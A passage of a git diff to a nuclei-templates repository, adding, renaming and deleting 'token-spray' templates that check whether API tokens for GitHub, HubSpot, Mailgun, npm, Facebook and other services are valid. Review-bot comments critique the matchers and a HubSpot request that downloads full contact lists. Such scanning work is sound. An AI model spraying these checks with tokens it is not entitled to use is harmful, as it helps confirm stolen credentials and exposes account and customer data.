daffainfo + severity: info + reference: + - https://collection.cooperhewitt.org/api/methods/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md + tags: token-spray,cooperhewitt + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/nuclei-templates/Other/api-dbt-413.yaml b/nuclei-templates/Other/api-dbt-413.yaml new file mode 100644 index 0000000000..1e4f804b0c --- /dev/null +++ b/nuclei-templates/Other/api-dbt-413.yaml 
@@ -0,0 +1,24 @@ +id: api-dbt +info: + name: dbt Cloud API Test + author: dwisiswant0 + severity: info + reference: + - https://docs.getdbt.com/docs/introduction + tags: token-spray,dbt +self-contained: true +requests: + - method: GET + path: + - "https://cloud.getdbt.com/api/v2/accounts/" + headers: + Content-Type: application/json + Authorization: Token {{token}} + matchers: + - type: word + part: body + words: + - "Invalid token" + - "Authentication credentials were not provided." + condition: or + negative: true diff --git a/nuclei-templates/Other/api-dbt.yaml b/nuclei-templates/Other/api-dbt.yaml deleted file mode 100644 index 8d19b5b055..0000000000 --- a/nuclei-templates/Other/api-dbt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-dbt - -info: - name: dbt Cloud API Test - author: dwisiswant0 - severity: info - reference: https://docs.getdbt.com/docs/introduction - tags: token-spray,dbt - -self-contained: true -requests: - - method: GET - path: - - "https://cloud.getdbt.com/api/v2/accounts/" - headers: - Content-Type: application/json - Authorization: Token {{token}} - - matchers: - - type: word - part: body - words: - - "Invalid token" - - "Authentication credentials were not provided." - condition: or - negative: true diff --git a/nuclei-templates/Other/api-debounce-414.yaml b/nuclei-templates/Other/api-debounce-414.yaml deleted file mode 100644 index 521abd8fd3..0000000000 --- a/nuclei-templates/Other/api-debounce-414.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-debounce -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - tags: debounce,token-spray -self-contained: true -requests: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and 
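Review bot: The matcher in `api-dbt-413.yaml` is purely negative — absence of `Invalid token` or `Authentication credentials were not provided.` — so a 5xx, a maintenance page, or a 403 with any other wording is reported as a working dbt Cloud token. I'd pair it with a positive check under `matchers-condition: and`, e.g. `- type: status` / `status:` / `- 200`, or a word match on a key the accounts envelope actually contains (verify against a live response before picking one).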
diff --git a/nuclei-templates/Other/api-debounce.yaml b/nuclei-templates/Other/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/nuclei-templates/Other/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/nuclei-templates/Other/api-deviantart.yaml b/nuclei-templates/Other/api-deviantart.yaml deleted file mode 100644 index 87013947a1..0000000000 --- a/nuclei-templates/Other/api-deviantart.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-deviantart -info: - name: DeviantArt API Test - author: zzeitlin - reference: https://www.deviantart.com/developers/authentication - severity: info - tags: token-spray,deviantart -requests: - - method: POST - path: - - "https://www.deviantart.com/api/v1/oauth2/placebo" - body: "access_token={{token}}" - matchers: - - type: word - part: body - words: - - '"status":"error"' - negative: true diff --git a/nuclei-templates/Other/api-dribbble.yaml b/nuclei-templates/Other/api-dribbble-417.yaml similarity index 100% rename from nuclei-templates/Other/api-dribbble.yaml rename to nuclei-templates/Other/api-dribbble-417.yaml diff --git a/nuclei-templates/Other/api-dropbox.yaml b/nuclei-templates/Other/api-dropbox-418.yaml similarity index 100% rename from nuclei-templates/Other/api-dropbox.yaml rename to nuclei-templates/Other/api-dropbox-418.yaml diff --git a/nuclei-templates/Other/api-europeana-420.yaml b/nuclei-templates/Other/api-europeana-420.yaml new file mode 100644 index 0000000000..c0767ce8d7 --- /dev/null 
+++ b/nuclei-templates/Other/api-europeana-420.yaml
@@ -0,0 +1,25 @@
+id: api-europeana
+
+info:
+ name: Europeana API Test
+ author: daffainfo
+ severity: info
+ reference:
+ - https://pro.europeana.eu/page/search
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
+ tags: token-spray,europeana
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'success'
+ - 'apikey'
+ - 'action'
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/api-europeana.yaml b/nuclei-templates/Other/api-europeana.yaml
deleted file mode 100644
index 520c83775d..0000000000
--- a/nuclei-templates/Other/api-europeana.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: api-europeana
-
-info:
- name: Europeana API Test
- author: daffainfo
- severity: info
- reference:
- - https://pro.europeana.eu/page/search
- - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
- tags: token-spray,europeana
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
-
- matchers:
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/api-facebook-422.yaml b/nuclei-templates/Other/api-facebook-422.yaml
deleted file mode 100644
index 07bfb85fbb..0000000000
--- a/nuclei-templates/Other/api-facebook-422.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: api-facebook
-info:
- name: Facebook API Test
- author: dwisiswant0
- severity: info
- reference:
- - https://developers.facebook.com/tools/explorer/
- tags: token-spray,facebook
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://graph.facebook.com/me?access_token={{token}}"
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'application/json'
- - type: status
- status:
- - 200
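Review bot: The three words `success`, `apikey` and `action` in `api-europeana-420.yaml` are, as far as I can tell from Europeana's error envelope, also present when the key is rejected (the API echoes the `apikey`, the `action` name and `"success":false`), so this matcher would flag every sprayed key as valid — the deleted version at least required a 200. Match on the value rather than the key, `- '"success":true'`, and ideally add `- type: status` / `- 200` under `matchers-condition: and`. The new file also lacks a trailing newline.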
diff --git a/nuclei-templates/Other/api-facebook.yaml b/nuclei-templates/Other/api-facebook.yaml new file mode 100644 index 0000000000..8143cbc92c --- /dev/null +++ b/nuclei-templates/Other/api-facebook.yaml @@ -0,0 +1,25 @@ +id: api-facebook + +info: + name: Facebook API Test + author: dwisiswant0 + reference: https://developers.facebook.com/tools/explorer/ + severity: info + tags: token-spray,facebook + +self-contained: true +requests: + - method: GET + path: + - "https://graph.facebook.com/me?access_token={{token}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-festivo-425.yaml b/nuclei-templates/Other/api-festivo-425.yaml new file mode 100644 index 0000000000..c3b259852a --- /dev/null +++ b/nuclei-templates/Other/api-festivo-425.yaml @@ -0,0 +1,22 @@ +id: api-festivo +info: + name: Festivo API Test + author: daffainfo + severity: info + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md + tags: token-spray,festivo +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-festivo.yaml b/nuclei-templates/Other/api-festivo.yaml deleted file mode 100644 index 3911ce2636..0000000000 --- a/nuclei-templates/Other/api-festivo.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - description: Fastest and most advanced public holiday and observance service on the market - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-github-429.yaml b/nuclei-templates/Other/api-github-429.yaml new file mode 100644 index 0000000000..bff431e770 --- /dev/null +++ b/nuclei-templates/Other/api-github-429.yaml @@ -0,0 +1,24 @@ +id: api-github + +info: + name: GitHub API Test + author: zzeitlin + reference: https://docs.github.com/en/rest/reference/users + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://api.github.com/user" + headers: + Authorization: Basic {{base64('user:' + token)}} + + matchers: + - type: word + part: body + words: + - '"login":' + - '"avatar_url":' + condition: and diff --git a/nuclei-templates/Other/api-github.yaml b/nuclei-templates/Other/api-github.yaml deleted file mode 100644 index 764b42e28c..0000000000 --- a/nuclei-templates/Other/api-github.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-github - -info: - name: GitHub API Test - author: zzeitlin - reference: https://docs.github.com/en/rest/reference/users - severity: info - tags: token-spray,github - -self-contained: true -requests: - - method: GET - path: - - "https://api.github.com/user" - headers: - Authorization: Basic {{base64('user:' + token)}} - - matchers: - - type: word - part: body - words: - - '"login":' - - '"avatar_url":' - condition: and 
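Review bot: The `info:` block of `api-github-429.yaml` has two blank lines where `tags: token-spray,github` used to be (it is present in the `api-github.yaml` this change deletes), so the GitHub check silently drops out of every tag-filtered token-spray run; add `  tags: token-spray,github` back after `severity: info`. GitHub also documents `Authorization: Bearer {{token}}`, so a one-line comment on the `{{base64('user:' + token)}}` header saying why the Basic form with a dummy user was chosen would save the next editor a guess.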
diff --git a/nuclei-templates/Other/api-gitlab-431.yaml b/nuclei-templates/Other/api-gitlab-430.yaml similarity index 100% rename from nuclei-templates/Other/api-gitlab-431.yaml rename to nuclei-templates/Other/api-gitlab-430.yaml diff --git a/nuclei-templates/Other/api-heroku.yaml b/nuclei-templates/Other/api-heroku.yaml deleted file mode 100644 index 7cd418b045..0000000000 --- a/nuclei-templates/Other/api-heroku.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-heroku -info: - name: Heroku API Test - author: zzeitlin - reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api - severity: info - tags: token-spray,heroku -requests: - - method: POST - path: - - "https://api.heroku.com/apps" - headers: - Accept: application/vnd.heroku+json; version=3 - Authorization: Bearer {{token}} - matchers: - - type: status - status: - - 200 - - 201 - - 202 - - 206 - condition: or diff --git a/nuclei-templates/Other/api-hirak-rates-436.yaml b/nuclei-templates/Other/api-hirak-rates-436.yaml new file mode 100644 index 0000000000..22ecc89a2f --- /dev/null +++ b/nuclei-templates/Other/api-hirak-rates-436.yaml @@ -0,0 +1,23 @@ +id: api-hirak-rates +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md + tags: token-spray,hirak +self-contained: true +requests: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and diff --git a/nuclei-templates/Other/api-hirak-rates.yaml b/nuclei-templates/Other/api-hirak-rates.yaml deleted file mode 100644 index 6d61403334..0000000000 --- a/nuclei-templates/Other/api-hirak-rates.yaml +++ /dev/null 
@@ -1,27 +0,0 @@
-id: api-hirak-rates
-
-info:
- name: Hirak Exchange Rates API Test
- author: daffainfo
- severity: info
- description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits
- reference:
- - https://rates.hirak.site/
- - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates
- tags: token-spray,hirak
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://rates.hirak.site/stat/?token={{token}}"
-
- matchers:
- - type: word
- part: body
- words:
- - '"token":'
- - '"plan":'
- - '"hits":'
- - '"remain":'
- condition: and
diff --git a/nuclei-templates/Other/api-hubspot-437.yaml b/nuclei-templates/Other/api-hubspot-437.yaml
new file mode 100644
index 0000000000..73e525fb35
--- /dev/null
+++ b/nuclei-templates/Other/api-hubspot-437.yaml
@@ -0,0 +1,18 @@
+id: api-hubspot
+info:
+ name: HubSpot API Test
+ author: zzeitlin
+ reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
+ severity: info
+ tags: token-spray,hubspot
+requests:
+ - method: GET
+ path:
+ - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
+ - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'error'
+ negative: true
diff --git a/nuclei-templates/Other/api-hubspot.yaml b/nuclei-templates/Other/api-hubspot.yaml
deleted file mode 100644
index 4526b146f6..0000000000
--- a/nuclei-templates/Other/api-hubspot.yaml
+++ /dev/null
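Review bot: The second path in `api-hubspot-437.yaml`, `/contacts/v1/lists/all/contacts/all?hapikey={{token}}`, pulls the account's entire contact list — customer PII — just to test a key; the `api-hubspot.yaml` this change deletes used `/contacts/v1/lists/static?count=3`, which is sufficient and far less intrusive, so I'd go back to that or drop the second request. The matcher is also negative-only (`error` absent), so an empty body or HTML error page counts as a hit, whereas the deleted version's positive `"portalId":` / `"ownerId":` check was stronger. `self-contained: true` is missing too, unlike the sibling templates with absolute URLs.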
@@ -1,31 +0,0 @@
-id: api-hubspot
-
-info:
- name: HubSpot API Test
- author: zzeitlin
- severity: info
- reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
- tags: token-spray,hubspot
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
- - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}"
-
- matchers-condition: or
- matchers:
- - type: word
- part: body
- words:
- - '"portalId":'
- - '"ownerId":'
- condition: and
-
- - type: word
- part: body
- words:
- - '"metaData":'
- - '"portalId":'
- condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/api-iconfinder-439.yaml b/nuclei-templates/Other/api-iconfinder-438.yaml
similarity index 100%
rename from nuclei-templates/Other/api-iconfinder-439.yaml
rename to nuclei-templates/Other/api-iconfinder-438.yaml
diff --git a/nuclei-templates/Other/api-improvmx-440.yaml b/nuclei-templates/Other/api-improvmx-440.yaml
deleted file mode 100644
index 7d16536f15..0000000000
--- a/nuclei-templates/Other/api-improvmx-440.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: api-improvmx
-info:
- name: ImprovMX API Test
- author: daffainfo
- severity: info
- reference:
- - https://improvmx.com/api
- - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md
- tags: token-spray,improvmx
-self-contained: true
-requests:
- - raw:
- - |
- GET https://api.improvmx.com/v3/account HTTP/1.1
- Authorization: Basic {{base64(':' + token)}}
- Host: api.improvmx.com
- redirects: true
- max-redirects: 1
- matchers:
- - type: word
- part: body
- words:
- - '"billing_email":'
- - '"cancels_on":'
- - '"company_details":'
- condition: and
diff --git a/nuclei-templates/Other/api-improvmx.yaml b/nuclei-templates/Other/api-improvmx.yaml
new file mode 100644
index 0000000000..fb6c00f0d9
--- /dev/null
+++ b/nuclei-templates/Other/api-improvmx.yaml
@@ -0,0 +1,30 @@
+id: api-improvmx
+
+info:
+ name: ImprovMX API Test
+ author: daffainfo
+ severity: info
+ description: API for free email forwarding service
+ reference:
+ - https://improvmx.com/api
+ - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx
+ tags: token-spray,improvmx
+
+self-contained: true
+requests:
+ - raw:
+ - |
+ GET https://api.improvmx.com/v3/account HTTP/1.1
+ Authorization: Basic {{base64(':' + token)}}
+ Host: api.improvmx.com
+
+ redirects: true
+ max-redirects: 1
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"billing_email":'
+ - '"cancels_on":'
+ - '"company_details":'
+ condition: and
diff --git a/nuclei-templates/Other/api-instagram.yaml b/nuclei-templates/Other/api-instagram.yaml
index fc463c8bac..552c59fd50 100644
--- a/nuclei-templates/Other/api-instagram.yaml
+++ b/nuclei-templates/Other/api-instagram.yaml
@@ -1,23 +1,15 @@ id: api-instagramgraph - info: name: Instagram Graph API Test author: zzeitlin reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info tags: token-spray,instagram,graph - -self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" - + - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" matchers: - - type: word - part: body - words: - - '"data":' - - '"access_token":' - - '"name":' - condition: and + - type: status + status: + - 200
diff --git a/nuclei-templates/Other/api-instatus-442.yaml b/nuclei-templates/Other/api-instatus-442.yaml
new file mode 100644
index 0000000000..fb0b8dbdd4
--- /dev/null
+++ b/nuclei-templates/Other/api-instatus-442.yaml
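Review bot: The rewritten path in api-instagram.yaml pins `graph.facebook.com/v8.0/`, an older Graph API version than the `v12.0` it replaces; Graph API versions are retired on a fixed schedule, so this is likely to start failing with a version-deprecated error well before a current version would, and the new status-200-only matcher would then report every token as invalid. Prefer a current API version here. This hunk also drops `self-contained: true` while the path is still an absolute URL; depending on the nuclei release the repository targets, that may mean the template can no longer be run without a dummy target. The same drop happens in the api-mailchimp.yaml, api-mapbox-465.yaml and api-sonarcloud-494.yaml hunks, and the new api-hubspot-437.yaml, api-lokalise.yaml, api-mailgun.yaml, api-postmark.yaml, api-slack.yaml and api-square-496.yaml never set it.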
@@ -0,0 +1,25 @@
+id: api-instatus
+info:
+ name: Instatus API Test
+ author: daffainfo
+ severity: info
+ reference:
+ - https://instatus.com/help/api
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md
+ tags: token-spray,instatus
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.instatus.com/v1/pages"
+ headers:
+ Authorization: Bearer {{token}}
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"id":'
+ - '"subdomain":'
+ - '"name":'
+ - '"logoUrl":'
+ condition: and
diff --git a/nuclei-templates/Other/api-instatus.yaml b/nuclei-templates/Other/api-instatus.yaml
deleted file mode 100644
index 1175f1b8b3..0000000000
--- a/nuclei-templates/Other/api-instatus.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: api-instatus
-
-info:
- name: Instatus API Test
- author: daffainfo
- severity: info
- description: Post to and update maintenance and incidents on your status page through an HTTP REST API
- reference:
- - https://instatus.com/help/api
- - https://github.com/daffainfo/all-about-apikey/tree/main/instatus
- tags: token-spray,instatus
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.instatus.com/v1/pages"
- headers:
- Authorization: Bearer {{token}}
-
- matchers:
- - type: word
- part: body
- words:
- - '"id":'
- - '"subdomain":'
- - '"name":'
- - '"logoUrl":'
- condition: and
diff --git a/nuclei-templates/Other/api-iterable.yaml b/nuclei-templates/Other/api-iterable.yaml
deleted file mode 100644
index b4d465a644..0000000000
--- a/nuclei-templates/Other/api-iterable.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: api-iterable
-info:
- name: Iterable API Test
- author: zzeitlin
- reference: https://api.iterable.com/api/docs
- severity: info
- tags: token-spray,iterable
-requests:
- - method: GET
- path:
- - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty"
- headers:
- Api_Key: "{{token}}"
- matchers:
- - type: word
- part: body
- negative: true
- words:
- - 'BadApiKey'
- - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve
diff --git a/nuclei-templates/Other/api-launchdarkly-449.yaml b/nuclei-templates/Other/api-launchdarkly-449.yaml
deleted file mode 100644
index b9467edd41..0000000000
--- a/nuclei-templates/Other/api-launchdarkly-449.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: api-launchdarkly
-info:
- name: LaunchDarkly REST API
- author: Luqmaan Hadia
- severity: info
- reference:
- - https://apidocs.launchdarkly.com/
- tags: token-spray,launchdarkly
-self-contained: true
-requests:
- - raw:
- - |
- GET https://app.launchdarkly.com/api/v2/members HTTP/1.1
- Host: app.launchdarkly.com
- Authorization: {{token}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - '"totalCount":'
- - '"items":'
- condition: and
diff --git a/nuclei-templates/Other/api-launchdarkly.yaml b/nuclei-templates/Other/api-launchdarkly.yaml
new file mode 100644
index 0000000000..636ca9f02f
--- /dev/null
+++ b/nuclei-templates/Other/api-launchdarkly.yaml
@@ -0,0 +1,28 @@
+id: api-launchdarkly
+
+info:
+ name: LaunchDarkly REST API
+ author: Luqmaan Hadia
+ severity: info
+ reference: https://apidocs.launchdarkly.com/
+ tags: token-spray,launchdarkly
+
+self-contained: true
+requests:
+ - raw:
+ - |
+ GET https://app.launchdarkly.com/api/v2/members HTTP/1.1
+ Host: app.launchdarkly.com
+ Authorization: {{token}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"totalCount":'
+ - '"items":'
+ condition: and
diff --git a/nuclei-templates/Other/api-leanix.yaml b/nuclei-templates/Other/api-leanix-450.yaml
similarity index 100%
rename from nuclei-templates/Other/api-leanix.yaml
rename to nuclei-templates/Other/api-leanix-450.yaml
diff --git a/nuclei-templates/Other/api-linkfinder.yaml b/nuclei-templates/Other/api-linkfinder.yaml
deleted file mode 100644
index 38c579ea74..0000000000
--- a/nuclei-templates/Other/api-linkfinder.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: api-linkfinder
-
-info:
- name: API Recon
- author: nullenc0de
- severity: info
- tags: file
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- extractors:
- - type: regex
- name: url_params
- regex:
- - '[&\?][a-zA-Z0-9\_]+='
- - type: regex
- name: relative_links
- regex:
- - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|))
diff --git a/nuclei-templates/Other/api-lokalise-452.yaml b/nuclei-templates/Other/api-lokalise-452.yaml
deleted file mode 100644
index 1434df2c20..0000000000
--- a/nuclei-templates/Other/api-lokalise-452.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: api-lokalise
-
-info:
- name: Lokalise API Test
- author: zzeitlin
- severity: info
- reference: https://app.lokalise.com/api2docs/curl/#resource-projects
-
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.lokalise.com/api2/teams"
- headers:
- x-api-Token: "{{token}}"
-
- matchers:
- - type: word
- part: body
- words:
- - '"teams":'
- - '"team_id":'
- - '"name":'
- condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/api-lokalise.yaml b/nuclei-templates/Other/api-lokalise.yaml
new file mode 100644
index 0000000000..36e050c15d
--- /dev/null
+++ b/nuclei-templates/Other/api-lokalise.yaml
@@ -0,0 +1,17 @@
+id: api-lokalise
+info:
+ name: Lokalise API Test
+ author: zzeitlin
+ reference: https://app.lokalise.com/api2docs/curl/#resource-projects
+ severity: info
+ tags: token-spray,lokalise
+requests:
+ - method: GET
+ path:
+ - "https://api.lokalise.com/api2/projects/"
+ headers:
+ X-Api-Token: "{{token}}"
+ matchers:
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/api-loqate-453.yaml b/nuclei-templates/Other/api-loqate.yaml
similarity index 100%
rename from nuclei-templates/Other/api-loqate-453.yaml
rename to nuclei-templates/Other/api-loqate.yaml
diff --git a/nuclei-templates/Other/api-mailchimp.yaml b/nuclei-templates/Other/api-mailchimp.yaml
index 5232ddda97..68d9d200ce 100644
--- a/nuclei-templates/Other/api-mailchimp.yaml
+++ b/nuclei-templates/Other/api-mailchimp.yaml
@@ -1,20 +1,16 @@ id: api-mailchimp - info: name: Mailchimp API Test author: zzeitlin - severity: info reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info tags: token-spray,mailchimp - -self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.mandrillapp.com:465" - matchers: - type: word words:
diff --git a/nuclei-templates/Other/api-mailgun.yaml b/nuclei-templates/Other/api-mailgun.yaml
new file mode 100644
index 0000000000..5e92fa4a97
--- /dev/null
+++ b/nuclei-templates/Other/api-mailgun.yaml
@@ -0,0 +1,17 @@
+id: api-mailgun
+info:
+ name: Mailgun API Test
+ author: zzeitlin
+ reference: https://documentation.mailgun.com/en/latest/api-intro.html
+ severity: info
+ tags: token-spray,mailgun
+requests:
+ - method: GET
+ path:
+ - "https://api.mailgun.net/v3/domains"
+ headers:
+ Authorization: Basic {{base64('api:' + token)}}
+ matchers:
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/api-malshare-456.yaml b/nuclei-templates/Other/api-malshare-456.yaml
index b1108b4e33..d486f6f0fd 100644
--- a/nuclei-templates/Other/api-malshare-456.yaml
+++ b/nuclei-templates/Other/api-malshare-456.yaml
@@ -6,7 +6,7 @@ info: severity: info reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md tags: token-spray,malshare self-contained: true
diff --git a/nuclei-templates/Other/api-malwarebazaar.yaml b/nuclei-templates/Other/api-malwarebazaar-459.yaml
similarity index 100%
rename from nuclei-templates/Other/api-malwarebazaar.yaml
rename to nuclei-templates/Other/api-malwarebazaar-459.yaml
diff --git a/nuclei-templates/Other/api-mapbox-465.yaml b/nuclei-templates/Other/api-mapbox-465.yaml
index d742b68f1b..d38dadc2a8 100644
--- a/nuclei-templates/Other/api-mapbox-465.yaml
+++ b/nuclei-templates/Other/api-mapbox-465.yaml
@@ -1,23 +1,16 @@ id: api-mapbox - info: name: Mapbox API Test author: zzeitlin reference: https://docs.mapbox.com/api/search/geocoding/ severity: info - - -self-contained: true + tags: token-spray,mapbox requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - matchers: - - type: word - part: body - words: - - 'type' - - 'query' - - 'features' - condition: and + - type: status + status: + - 401 + negative: true
diff --git a/nuclei-templates/Other/api-mywot-467.yaml b/nuclei-templates/Other/api-mywot-468.yaml
similarity index 100%
rename from nuclei-templates/Other/api-mywot-467.yaml
rename to nuclei-templates/Other/api-mywot-468.yaml
diff --git a/nuclei-templates/Other/api-npm-471.yaml b/nuclei-templates/Other/api-npm-471.yaml
new file mode 100644
index 0000000000..e97673f901
--- /dev/null
+++ b/nuclei-templates/Other/api-npm-471.yaml
@@ -0,0 +1,23 @@
+id: api-npm
+
+info:
+ name: NPM API Test
+ author: zzeitlin
+ severity: info
+ reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
+
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://registry.npmjs.org/-/whoami"
+ headers:
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: status
+ status:
+ - 401
+ - 403
+ negative: true
diff --git a/nuclei-templates/Other/api-npm.yaml b/nuclei-templates/Other/api-npm.yaml
deleted file mode 100644
index a1e3db47b4..0000000000
--- a/nuclei-templates/Other/api-npm.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: api-npm
-info:
- name: NPM API Test
- author: zzeitlin
- reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
- severity: info
- tags: token-spray,node,npm,package,manager
-requests:
- - method: GET
- path:
- - "https://registry.npmjs.org/-/whoami"
- headers:
- Authorization: Bearer {{token}}
- matchers:
- - type: status
- status:
- - 401
- - 403
- negative: true
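Review bot: api-npm-471.yaml has no `tags:` line — its `info` block ends at `reference:` and is followed by two blank lines — so a run selected with `-tags token-spray`, the tag every other template on this page carries, never loads it. Replace the two blank lines with `tags: token-spray,npm` (the api-npm.yaml removed in the following hunk carried `token-spray,node,npm,package,manager`). api-pivotaltracker-482.yaml, further down, has the same two blank lines where its `tags:` entry should be.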
diff --git a/nuclei-templates/Other/api-openweather-473.yaml b/nuclei-templates/Other/api-openweather-473.yaml
deleted file mode 100644
index 158ddb3ccf..0000000000
--- a/nuclei-templates/Other/api-openweather-473.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-id: api-openweather
-info:
- name: OpenWeather API Test
- author: zzeitlin
- reference: https://openweathermap.org/current
- severity: info
- tags: token-spray,weather,openweather
-requests:
- - method: GET
- path:
- - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}"
- matchers:
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/api-pagerduty.yaml b/nuclei-templates/Other/api-pagerduty.yaml
deleted file mode 100644
index 6456f587ae..0000000000
--- a/nuclei-templates/Other/api-pagerduty.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: api-pagerduty
-info:
- name: Pagerduty API Test
- author: zzeitlin
- reference: https://developer.pagerduty.com/api-reference
- severity: info
- tags: token-spray,pagerduty
-requests:
- - method: GET
- path:
- - "https://api.pagerduty.com/schedules"
- headers:
